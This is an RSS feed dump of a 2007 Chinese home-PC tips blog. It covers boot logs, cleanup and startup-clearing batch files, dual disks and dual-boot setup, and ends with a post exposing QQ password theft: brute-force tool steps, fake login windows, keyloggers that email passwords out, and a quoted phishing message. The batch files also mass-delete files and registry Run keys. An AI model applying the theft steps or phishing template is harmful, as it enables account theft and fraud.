<P style="TEXT-INDENT: 2em">你的电脑上的木马，来源有两种，一种是你自己不小心，运行了包含有木马的程序，另一种情况是，“网友”送给你“好玩”的程序。所以，你以后要小心了，要弄清楚了是什么程序再运行，安装容易排除难呀。?nbsp; </P>
<P style="TEXT-INDENT: 2em">排除了木马以后，你就可以监视端口，---- 悄悄等待黑客的来临.</P></div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/502871112007111054833397</comments>
    <slash:comments>9</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/502871112007111054833397</guid>
    <pubDate>Mon, 10 Dec 2007 17:48:33 +0800</pubDate>
    <dcterms:modified>2008-07-15T22:28:22+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[怎样才能知道自己的电脑是否被人偷偷打开过]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/5028711120071124263927</link>
    <description><![CDATA[<div><P>相信大家都想知道自己不在的时候电脑是否被人动过对吧``</P>
<P>&nbsp; 现在我们都分享这小小的技术`！</P>
<P>在开始——运行里输入<FONT color=#ff0000>&nbsp; C:\WINDOWS\SchedLgU.Txt</FONT>&nbsp;&nbsp;&nbsp; 接着就会跳出一个笔记本`里面就是电脑的开关纪录！越住下纪录就越新！！<FONT color=#333399>把红色的复制进去！就方便的多啦`！</FONT></P></div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/5028711120071124263927</comments>
    <slash:comments>53</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/5028711120071124263927</guid>
    <pubDate>Sun, 2 Dec 2007 16:26:03 +0800</pubDate>
    <dcterms:modified>2007-12-25T09:14:43+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[ 教你如何处理加速电脑速度]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/50287111200711175515396</link>
    <description><![CDATA[<div>第一招：清除系统垃圾——你也可以做的到！<BR><BR>在每天使用电脑的工作、学习和娱乐中，你是否注意到你的电脑系统磁盘的可用空间正在一天天的减少呢？系统是不是也像老去的猴王一样，动作一天比一天迟缓呢？终于有一天猴王变成了蜗牛。您的心情也变的焦急烦躁了吧？！<BR>没错！Windows在安装和使用过程中都会产生相当多的垃圾文件，包括临时文件（如：*.tmp、*._mp）日志文件（*.log）、临时帮助文件（*.gid）、磁盘检查文件（*.chk）、临时备份文件（如：*.old、*.bak）以及其他临时文件。特别是如果一段时间不清理IE的临时文件夹“Temporary Internet Files”，其中的缓存文件有时会占用上百MB的磁盘空间。这些垃圾文件不仅仅浪费了宝贵的磁盘空间，严重时还会使系统运行慢如蜗牛。这点相信你肯定忍受不了吧！所以应及时清理系统的垃圾文件的淤塞，保持系统的“苗条”身材，轻松流畅上网！朋友来吧，现在就让我们一起来快速清除系统垃圾吧！！<BR>“工欲善其事，必先利其器。”那么如果使用自己亲手制作的小工具来清理垃圾是不是会更有一种特别的乐趣呢？！呵呵，有点心动了吧，请跟着我做：<BR>在桌面上单击鼠标右键，选择新建一个“记事本”，把下面红色部分复制进去，点“另存为”，把文件名定为“ 清除系统垃圾.bat ”就完成，记住后缀名一定要是.bat，然后把它移到一个您想要保存的目录，OK了！你的垃圾清除器就这样制作成功了！双击它就能很快地清理垃圾文件，大约一分钟不到。 <BR><BR>@echo off<BR>echo 清除系统垃圾过程中，请稍等......<BR>del /f /s /q %systemdrive%\*.tmp<BR>del /f /s /q %systemdrive%\*._mp<BR>del /f /s /q %systemdrive%\*.log<BR>del /f /s /q %systemdrive%\*.gid<BR>del /f /s /q %systemdrive%\*.chk<BR>del /f /s /q %systemdrive%\*.old<BR>del /f /s /q %systemdrive%\recycled\*.*<BR>del /f /s /q %windir%\*.bak<BR>del /f /s /q %windir%\prefetch\*.*<BR>rd /s /q %windir%\temp &amp; md %windir%\temp<BR>del /f /q %userprofile%\cookies\*.*<BR>del /f /q %userprofile%\recent\*.*<BR>del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"<BR>del /f /s /q "%userprofile%\Local Settings\Temp\*.*"<BR>del /f /s /q "%userprofile%\recent\*.*"<BR>echo 清除系统垃圾完成！按任意键继续……感谢您的使用！！<BR>echo. &amp; pause <BR><BR>以后每隔一段时间你就可以双击些工具，运行完必就会还你一个“苗条”的系统了！！到时候再看看你的电脑，是不是急速如飞呢？这招比那些所谓的优化大师、超级兔子更加简便好用！不会破坏系统文件！<BR><BR>第二招：清除所有多余的启动项目 <BR><BR><BR>此命令将自动清理所有非必要的启动项目，仅保留输入法(ctfmon)。 <BR>目的是减少不必要的资源占用，使系统运行顺畅。<BR><BR>在桌面上单击鼠标右键，选择新建一个“记事本”，把下面红色部分复制进去，点“另存为”，把文件名定为“ 清除启动项.bat ”就完成，记住后缀名一定要是.bat，然后把它移到一个您想要保存的目录，OK了！大约一分钟不到。<BR><BR>@ ECHO OFF <BR>color 1f <BR>title 清除所有多余的启动项目 <BR>PAUSE <BR>reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /va /f <BR>reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /va /f <BR>reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon.exe /d C:\WINDOWS\system32\ctfmon.exe <BR>reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /f <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\IMJPMIG8.1" <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\IMJPMIG8.1" /v command /d ""C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32" <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\IMJPMIG8.1" /v hkey /d HKLM <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\IMJPMIG8.1" /v inimapping /d 0 <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\IMJPMIG8.1" /v item /d IMJPMIG <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\IMJPMIG8.1" /v key /d SOFTWARE\Microsoft\Windows\CurrentVersion\Run <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\PHIME2002A" <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\PHIME2002A" /v command /d "C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName" <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\PHIME2002A" /v hkey /d HKLM <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\PHIME2002A" /v inimapping /d 0 <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\PHIME2002A" /v item /d TINTSETP <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\PHIME2002A" /v key /d SOFTWARE\Microsoft\Windows\CurrentVersion\Run <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\PHIME2002ASync" <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\PHIME2002ASync" /v command /d ""C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32" <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\PHIME2002ASync" /v hkey /d HKLM <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\PHIME2002ASync" /v inimapping /d 0 <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\PHIME2002ASync" /v item /d TINTSETP <BR>reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\PHIME2002ASync" /v key /d SOFTWARE\Microsoft\Windows\CurrentVersion\Run <BR>del "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\*.*" /q /f <BR>del "C:\Documents and Settings\Default User\「开始」菜单\程序\启动\*.*" /q /f <BR>del "%userprofile%\「开始」菜单\程序\启动\*.*" /q /f <BR>start C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe <BR><BR>第三招：清除所有多余的桌面右键菜单 <BR><BR><BR>很多显卡在装了驱动之后，桌面右键会多出一项或多项菜单，这些功能并不实用， <BR>还会拖慢右键的弹出速度，我们最好清除它。<BR><BR>在桌面上单击鼠标右键，选择新建一个“记事本”，把下面红色部分复制进去，点“另存为”，把文件名定为“ 清除右键菜单.bat ”就完成，记住后缀名一定要是.bat，然后把它移到一个您想要保存的目录，OK了！大约一分钟不到。<BR><BR>@ ECHO OFF <BR>title 清除所有多余的桌面右键菜单 <BR>color 1a <BR>PAUSE <BR>regsvr32 /u /s igfxpph.dll <BR>reg delete HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers /f <BR>reg add HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers\new /ve /d {D969A300-E7FF-11d0-A93B-00A0C90F2719} <BR>reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v HotKeysCmds /f <BR>reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v IgfxTray /f <BR><BR>第四招：C盘转换为NTFS格式 <BR><BR>NTFS格式是WinXP推荐使用的格式。转换为NTFS格式能提高硬盘存储的 <BR>效率，并可设置访问权限以保护文件。但NTFS格式的分区在DOS/WIN9X <BR>下均不能被识别，可能会给初级用户造成不便。如无必要请不要转换。<BR>在桌面上单击鼠标右键，选择新建一个“记事本”，把下面红色部分复制进去，点“另存为”，把文件名定为“ C盘转换为NTFS格式.bat ”就完成，记住后缀名一定要是.bat，然后把它移到一个您想要保存的目录，OK了！大约一分钟不到。<BR><BR>@ ECHO OFF <BR>color 1b <BR>title C盘转换为NTFS格式 <BR>convert c:/fs:ntfs <BR><BR><BR>第五招：给每个盘添加卷标 <BR><BR>此命令将为本机每个盘都添加上卷标，一般是用在新机上面。 <BR>以引导初学者更合理地支配他们的硬盘空间。 <BR>方法如上，复制内容见下（红色部分）<BR><BR>在桌面上单击鼠标右键，选择新建一个“记事本”，把下面红色部分复制进去，点“另存为”，把文件名定为“ 给每个盘添加卷标.bat ”就完成，记住后缀名一定要是.bat，然后把它移到一个您想要保存的目录，OK了！大约一分钟不到。<BR><BR>@ ECHO OFF <BR>title 给每个盘添加卷标 <BR>color 1B <BR>PAUSE <BR>c: <BR>label c:WINXP <BR>label d:软件 <BR>label e:影视 <BR>label f:游戏 <BR>label g:资料 <BR>label h:备份 <BR>d: <BR>md 本机驱动程序 <BR>md 本机驱动程序\0.DirectX <BR>md 本机驱动程序\1.主板芯片组 <BR>md 本机驱动程序\2.显卡 <BR>md 本机驱动程序\3.声卡 <BR>md 本机驱动程序\4.网卡 <BR>md 本机驱动程序\5.摄像头 <BR></div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/50287111200711175515396</comments>
    <slash:comments>6</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/50287111200711175515396</guid>
    <pubDate>Sat, 1 Dec 2007 19:55:15 +0800</pubDate>
    <dcterms:modified>2007-12-25T09:15:42+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[怎样一台电脑装两个硬盘]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/50287111200710279431205</link>
    <description><![CDATA[<div><P>教你安装双硬盘 <BR><BR>其实，安装双硬盘看似一件简单的工作，却也有不少讲究的地方，下面就让我细细道来。 <BR><BR>主从盘的设置 <BR><BR>在装双硬盘前，首先应确定机箱中是否还有装第二硬盘的位置，若只有5寸槽的位置，则需要先准备一固定架。另外，还要确定一下电源插头、功率是否足够。在一条排线上装两个硬盘时，应将两块硬盘按自己的意愿分别设置成主盘和从盘，这样安装后才能正常使用。主、从盘的设置可按以下两种方法进行。 <BR><BR>1.由硬盘跳线器设置 <BR><BR>所有的IDE设备包括硬盘都使用一组跳线来确定安装后的主、从状态。硬盘跳线器大多设置在电源联接座和数据线联接插座之间的地方(也有设在电路板上的)，通常由3组(6或7)针或4组(8或9)针再加一个或两个跳线帽组成。另外，在硬盘正面或反面一定还印有主盘(Master)、从盘(Slave)以及由电缆选择(Cableselect)的跳线方法。 <BR><BR>各类硬盘的跳线方法和标记说明大同小异，比如昆腾硬盘的跳线器通常有9针4组，其中一根叫“Key"，用于定位以便用户正确识别跳线位置。 <BR><BR>2.由硬盘跳线器和40芯特制硬盘线配合确定 <BR><BR>这种主、从盘的设置是先将硬盘跳线设置在“电缆选择有效”后，然后再根据需要将主、从盘联接在对应的硬盘线插头上。硬盘主、盘状态的设置取决于硬盘与硬盘线的联接插头。通常联接硬盘线中段插头的盘是主盘，联接在硬盘线尽头插头上的盘就是从盘。采用这种方法设置主、从盘时，必须将联接在同一条硬盘线的所有IDE接口设备(包括光驱等)跳线器设置在“电缆选择”位置。 <BR><BR>能决定硬盘主、从盘状态40芯硬盘线是特制的。制作方法是将普通40芯硬盘线的第28根线(从第1根红线或其它标记开始数)在两个硬盘插头之间的位置上切断后做成的，切线时注意不能弄断其它线。使用特制硬盘线确定主、从盘状态的优点是使用方便。当需要交换硬盘主、从状态时只要将联接的硬盘线插头位置对调一下即可，不需要拆下硬盘来重新跳线。 <BR><BR>安装双硬盘要注意的问题 <BR><BR>1.在新增或升级硬盘时，尽量优先选择品牌相同的硬盘。因为不同品牌硬盘在同一条硬盘线上使用可能会出现兼容问题。如果电脑启动时检测不到或只检测出一块硬盘的情况时，在确认两块硬盘跳线设置都没有错误前提下可先断开原使用的硬盘再重新开机，如果这时电脑能检测出新加硬盘，那么就是两块硬盘兼容有问题。解决方法是将新硬盘放在第二硬盘线上使用。如果必须使用同一硬盘线，那么就将两块硬盘的主、从关系对换一下。 <BR><BR>另外，如果新增加的硬盘与光驱等设备一起接在第二硬盘线上时，要注意光驱等设备的主、从盘设置不与新加硬盘相冲突，否则也会出现主板检测不到新增硬盘或者找不到原光驱问题。 <BR><BR>2.要注意盘符交错的问题。在多分区的情况下，硬盘分区的排列顺序有些古怪：主硬盘的主分区仍被计算机认为是C盘，而第二硬盘的主分区则被认为是D盘，接下来是第一硬盘的其他分区依次从E盘开始排列，然后是第二硬盘的其他分区接着第一硬盘的最后盘符依次排列。这就有可能导致安装双硬盘后，系统或某些软件的不正常。 <BR><BR>要使加第二硬盘后盘符不发生变化，解决的办法有两个：如果你只使用WIN98的话，比较简单，在CMOS中将第二硬盘设为NONE即可，但在纯DOS下不认第二个硬盘。第二种方法是接上双硬盘后，给第二个硬盘重新分区，删掉其主DOS分区，只分扩展分区。这样盘符也不会交错。当然若第一硬盘只有一个分区的话，也不存在盘符交错的问题。此外，某些计算机硬盘厂商，为解决硬盘盘符交错问题提供了一些辅助软件。 <BR><BR>3.安装双硬盘后要注意散热，两个硬盘间空隙不能太小，且尽量不要超频。</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P></CA></P></div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/50287111200710279431205</comments>
    <slash:comments>13</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/50287111200710279431205</guid>
    <pubDate>Tue, 27 Nov 2007 21:43:01 +0800</pubDate>
    <dcterms:modified>2007-12-25T09:16:08+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[怎样一台电脑装两个系统]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/502871112007102793857805</link>
    <description><![CDATA[<div><P>如何把双系统装到一个分区 <BR>在安装双系统的时候，一般的报刊杂志介绍的方法都是把每个系统装到独立的不同分区，以免互相影响，造成不必要的麻烦。比如，Windows 98装到C盘，Windows XP装到D盘。那么，双系统到底能不能装到一个分区或者一个没有分区的硬盘呢？笔者经过尝试，发现一个分区装双系统其实是可行的，有兴趣的朋友不妨试试。 <BR>安装Windows 98，然后在Windows 98中安装Windows XP。要注意的是在安装时，选择全新安装。在安装选项对话框中单击“高级”选项，然后选择一个新的路径，如C:＼winxp＼，而不要用默认的＼windows＼目录，否则就会把Windows 98的同名文件被覆盖，造成问题。跳过升级到NTFS这一步。经过一段等待，Windows XP安装完成了，重新启动，结果发现电脑自动进入Windows XP，双重启动菜单根本就没出现，打开C盘，点“工具→文件夹选项→查看→显示所有文件和文件夹”，发现实现双启动所需的文件都存在，看来问题并不严重，找到BOOT.INI，点右键，选“属性”，取消“只读”然后打开它，重新编辑一下： <BR>[boot loader] <BR>timeout=30 <BR>default=C:＼ <BR>[operating systems] <BR>C:＼="Microsoft Windows" <BR>multi(0)disk(0)rdisk(0)partition(1)＼WINXP="Microsoft Windows XP Professional" /fastdetect <BR>保存，重新启动电脑，双重启动菜单出现，分别进入两个系统试试，没有任何问题，安装成功。 <BR>轻松卸载多系统之预备知识 <BR>越来越多的朋友在硬盘中安装了多个操作系统，要知道，这安装容易，卸载难啊。其实卸载也不可怕。 <BR>卸载的共通点 <BR>1.释放要卸载的操作系统对引导扇区的控制权，并将控制权交由其他操作系统管理。 2.在多操作系统引导菜单中的选项中去除要卸载的操作系统选项。3.删除系统，释放剩余空间。 <BR>卸载Windows多操作系统 <BR>卸载多系统中的Win2000/XP/2003 <BR>要将Win 2000/XP/2003从多系统中彻底删除，留下Win9X/Me系统，可以根据具体情况按以下方法操作。 <BR>1.如果多操作系统所在的安装分区都是FAT32分区，可以直接在Win9X/Me下删除Win2000/XP/2003的Windows或Winnt、Program Files和Documents and Settings目录，然后删除C盘中的如下文件：ntldr、ntdetect.com、boot.ini、ntbootdd.sys(如果你有SCSI设备的话)和bootfont.bin，最后用Windows 9X/Me启动光盘引导计算机，执行命令：“a:sys c：”即可彻底卸载WinXP。 <BR>提示：另外，也可以用Win98启动盘启动电脑，运行“FORMAT”命令直接快速格式化Win2000/XP/2003所在的硬盘分区，如A:&gt;FORMAT D:/Q ，之后再运行“SYS C：”命令以使硬盘可引导。 <BR>2.如果Win2000/XP/2003采用的是NTFS分区，可以使用Win98启动盘启动电脑，运行“FDISK”命令，虽然FDISK也不能识别Win2000/XP/2003所在的NTFS分区，显示其为不明分区(unknown partition)，但我们仍可以将该分区删除掉，然后重新分区即可。 <BR><BR>如何装双系统::: <BR>先安装版本比较旧的系统，然后放入较新的系统盘！ <BR>比如98与XP，先安装98系统，然后进入98系统，放入XP系统盘，选择全新安装，不要选择升级安装，另外最好安装到不同的硬盘里！ <BR><BR>PS：eeyuse，没听说过要进入98里再装XP的！！！那是你孤陋寡闻了！你知不知道还可以先装XP再装98呢？增长知识，不是让你出来炫耀的！ <BR>下面我向楼主介绍一下，从高向低安装，如装XP再装2000的方法，安装98的方法也一样！ <BR>你首先要做一些准备工作： <BR><BR>第一就是Windows2000的安装光盘。还需要有至少两个硬盘分区，安装双系统的时候，很不建议你把两个系统安装到同一个分区中，这样可能会对以后的使用造成很多麻烦。如果以上的工作你全部做好了，那么就继续我们的安装吧。 <BR><BR>假设你的WindowsXP安装在C盘，你想安装Windows2000到D盘，那么只要用Windows2000的光盘启动系统，直接运行安装程序并安装到D盘就可以，只不过这样安装后双启动菜单会失效，只能进入Windows2000。原因是这样的： <BR><BR>在WindowsNT系统的启动中，用到了很多重要的系统文件，而在安装了XP的机器上再装2000的时候会把XP的NTLDR和NTDETECT.COM两个文件替换为Windows2000中版本较低的同名文件，而Windows2000中的这两个文件是不能引导WindowsXP的。因此我们的修复也就是用WindowsXP中的文件替换被Windows2000覆盖的该文件。 <BR><BR>这两个文件都保存在C盘的根目录下，不过他们有默认的隐含、系统和只读属性，因此你不能用一般的方法替换，而首先要解除他们的隐含、系统和只读属性。方法是这样的： <BR><BR>进入到Windows2000中，在运行中分别输入 <BR><BR>attribc:\ntldr–s–r–h <BR>attribc:\ntdetect.com–s–r–h <BR><BR>每行输入完成后按下回车键。这时你已经完全的解除了这两个文件的系统、隐含和只读属性。现在从WindowsXP的安装光盘的I386文件夹中复制这两个同名的文件出来到C盘根目录，并覆盖原文件。这时你的双启动菜单就已经恢复了。不过安全起见我们可以把那两个文件隐藏起来，方法是，在运行中分别输入： <BR><BR>attribc:\ntldr+s+r+h <BR>attribc:\ntdetect.com+s+r+h <BR><BR>这样会重新赋予那两个文件系统、隐含和只读属性。 <BR><BR>重启动一下看看吧，你的双启动菜单已经完全正常了。</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>如果你会装单系统，装双系统你会很好装的！ <BR><BR>例如： <BR>1.先装windows98，把98装在c盘中，装好以后，重新启动，在装XP，在让你选安装目录时你选择D盘！ 安装完后重新启动，你会发现只有XP系统一个启动菜单， <BR><BR>2.把windows98的安装盘放进光驱，然后出现引导菜单！ <BR>里面有3个选项 <BR>（1）安装windows98 <BR>（2）修复windows98 <BR>（3）推出安装windows98 <BR><BR>3.你选择（2）修复windows98 <BR><BR><BR>4。然后重新启动，这时你会发现，有两个启动菜单拉！ <BR><BR>windows xp <BR>windows 98 <BR><BR><BR>提示注意：1.不论装几个系统，都是由版本的低级向高级装的， 如果你想装 98和 2000，那么你就的先装98然后装2000，如果想装2000和XP，你就的装2000，然后在装XP！ <BR>2.在低版本上装高版本的时候一般都有一个提示对话框，内容是：推荐你在低版本上升级高版本！如果你只想升级你可以选升级，如果你是装双系统，你可以点击“全新安装”！ <BR>最后祝你好运，如果有不明白的请问我，我的QQ是：136582458</P></div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/502871112007102793857805</comments>
    <slash:comments>10</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/502871112007102793857805</guid>
    <pubDate>Tue, 27 Nov 2007 21:38:57 +0800</pubDate>
    <dcterms:modified>2007-12-25T09:16:17+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[揭秘远程破解盗窃QQ密码的各种方法]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/502871112007102785551664</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">“远程破解”与“本地破解”正好相反，是指QQ盗号者通过网络盗窃远端QQ用户的密码。这种QQ破解有很多方法，如在线密码破解、登录窗口破解、邮箱破解、消息诈骗以及形形色色的QQ木马病毒等。下面就让我们一同来看看这些QQ密码的远程破解是怎么实现的。 </P>
<P style="TEXT-INDENT: 2em">1、在线密码破解 </P>
<P style="TEXT-INDENT: 2em">大家知道QQ可以利用代理服务器登录，这是一种保护措施。它不仅可以隐藏用户的真实IP地址，以避免遭受网络攻击，还可以加快登录速度，保证登录的稳定性。 </P>
<P style="TEXT-INDENT: 2em">在线密码破解和本地密码破解采用的技术方法类似，都是穷举法，只不过前者完全脱离了本地用户使用的QQ。它通过对登录代理服务器进行扫描，只要想盗的QQ号码在线，就可利用在线盗号工具实现远程TCP/IP的追捕，从而神不知鬼不觉地盗取QQ密码！ </P>
<P style="TEXT-INDENT: 2em">在线破解改变了本地破解那种被动的破解方式，只要是在线的QQ号码都可以破解，适用范围较广。但是由于它仍然采用穷举法技术，所以在枚举密钥位数长度以及类型时，校验时间很长，破解效率不高。同样，这种方法还受到电脑速度、网速等诸多因素的影响，因此比前面的本地破解更麻烦。 </P>
<P style="TEXT-INDENT: 2em">目前功能比较强大的一款QQ密码在线破解软件叫QQExplorer。它的破解操作分四步：第一步，在QQ起始号码和结束号码中填上想要盗取的QQ号码（此号码必须在线）；第二步，在“添加或删除HTTP代理服务器”中输入代理服务器的IP地址和端口号码（如果你嫌自己寻找QQ代理服务器麻烦，可以使用一些现代的QQ代理公布软件）；第三步，点击“添加&amp;测试”按钮，软件先自动检测此服务器是否正常，确定后将它加入代理服务器列表（此软件可填入多个代理服务器的地址，并且能够自动筛选不可用或者速度慢的服务器）；第四步，点击“开始”按钮，开始在线密码破解…… </P>
<P style="TEXT-INDENT: 2em">2、登录窗口破解 </P>
<P style="TEXT-INDENT: 2em">伪造QQ登录窗口的盗号方法非常简单，这是一种比较另类的木马破解方法（后面对木马破解有专门讲述）。先用盗号软件生成一个伪装的QQ主程序，它运行后会出现跟腾讯QQ一模一样的登录窗口，只要用户在这个伪登录窗口中登录，输入的QQ号及密码就会被记录下来，并通过电子邮件发送到盗号者指定的油箱中，在此以一款叫“狐Q”的软件为例，首次运行它时，它会把自身复制到QQ目录中，并把原来的QQ.exe文件改名为QQ.com（这样的更改不会影响QQ的正常运行）。设置完毕后，“狐Q”的原程序就会消失，伪装成QQ等待“猎物”上钩……在其软件设置中，有一项设置可以决定真假QQ交替运行的次数，可以减少用户在使用QQ时产生的怀疑。比如说将“生效次数”设定为3，那么用户第一次运行的是真QQ了，也就是说在第三次运行时，用户的QQ号便被盗了！在QQ密码发送的过程中，如果发送失败，它还会把QQ号和密码记下来，等待下一次发送。 </P>
<P style="TEXT-INDENT: 2em">即时监视QQ登录窗口的盗号方法利用Windows窗口函数、句柄功能实现QQ号和密码的后台截取。此类软件几乎可以捕获Windows下所有标准密码框中的密码，如QQ、Outlook、屏幕保护程序、各种电子邮件客户端、各种游戏账号和上网账号等。捕获后，它也会将密码实时发送到盗号者指定的邮箱中。其代表性的盗号软件是“密码使者”，它几乎可以捕获Windows 9x/2000/XP下所有登录窗口中的密码，并且还能够盗取在网页中登录的各种密码。盗号在使用这款软件时，只须填上用于接收别人QQ密码的邮箱地址及保护密码，并把生成的盗号器文件传过去哄骗别人运行，然后就可以坐等密码上门！此软件与传统的键盘记录器不同，它在电脑每次开机时隐藏自启动，不管密码是用键盘输入的，还是复制、粘贴的，都能够有效地实时拦截！其注册版本居然还带有自动升级的功能，破坏力十分巨大。</P>
<P style="TEXT-INDENT: 2em">3、邮箱破解 </P>
<P style="TEXT-INDENT: 2em">利用邮箱盗取QQ密码也是一种比较常用的方法。我们都知道，腾讯公司在对用户的QQ号码进行验证时需要用户填写电子邮箱。对于申请了“密码保护”功能的用户，在腾讯主页上找回遗忘的密码时，密码会被发送到用户注册时的邮箱中。所以，只要盗号者破解了对方的电子邮箱，就有机会得到其QQ密码！通常我们在对方QQ注册时填写的邮箱。至于如何破解电子邮箱，具体的操作方法有多种，由于它有点超出文本的范畴，所以大家可以自己上网查询相关资料，在此就不赘述了。 </P>
<P style="TEXT-INDENT: 2em">4、消息诈骗 </P>
<P style="TEXT-INDENT: 2em">孔子曰：上士杀人用笔端，中士杀人用语言，下士杀人用石盘。远程盗取QQ密码还有一种大家最常见也是最简单最有效的方法，那就是利用不少人爱贪小便宜的弱点，进行人为的欺骗！ </P>
<P style="TEXT-INDENT: 2em">标题:腾讯关于xxxxx获奖通知 </P>
<P style="TEXT-INDENT: 2em">“QQ幸运儿：恭喜！！！您已经成为QQ在线网友齐抽奖的中奖用户。您将获赠精美T恤1件，并有机会得到NOKIA 7110手机1部。腾讯公司(tencent.com)注：奖品是以邮寄方式寄出，请您认真填写以下资料。如果填写错误，将被作为自动放弃获奖机会处理。&gt; &gt; QQ号码：&gt; 密码：&gt; 姓名：&gt; E-mail地址：&gt; 身份证号码：&gt; 通讯地址：&gt; 联系电话：&gt; 邮编：” </P>
<P style="TEXT-INDENT: 2em">比如我们的QQ经常会收到如下的陌生人消息。 </P>
<P style="TEXT-INDENT: 2em">如果你真的如实填写这些资料并傻傻的发送回去，不一会儿QQ密码就被盗了。 </P>
<P style="TEXT-INDENT: 2em">还有类似这样的消息：“亲爱的***号QQ用户，恭喜你你已经成为腾讯的幸运号码，腾讯公司送你QQ靓号：12345，密码：54321。请尽快登陆并修改密码，感谢您对腾讯公司的支持！”不少人一看，以为白捡的便宜来了 ，登录一试还是真的，于是就大大咧咧地笑纳了。但是，很多人为了方便，不管什么东西都爱使用相同的密码，所以当这个QQ号的密码被你改为与自己QQ号相同的密码时，自己QQ号的连同这个赠送的QQ号都得玩完！这是因为，赠送的QQ号已被盗号者申请过密码保护，当你更改密码后他就利用腾讯的密码保护功能把它收了回去，同时也收走你的QQ密码。如果你的QQ没有申请过密码保护，此刻就只能和它永别了。 </P>
<P style="TEXT-INDENT: 2em">5、更多的木马破解 </P>
<P style="TEXT-INDENT: 2em">“古希腊大军围攻特洛伊城，久攻不破，遂造一大木马藏匿将士于其中，大部队假装撤退而弃木马。城中得知敌退，将木马作战利品拖入城内。午夜时分，匿于木马中的将士开启城门四处纵火，城外伏兵涌入，里应外合，焚屠特洛伊城。”这是古希腊神话《木马屠城记》的故事，其中那只木马被黑客程序借用其名，表“一经潜入，后患无穷”之意。一个完整的木马程序由服务器端和控制端组成。所谓“中了木马”，是指用户的电脑中被安装了木马的服务器端，而拥有控制端的盗号者就通过网络远程控制该电脑，从而轻而易举地盗得该缒灾械腝Q密码。 </P>
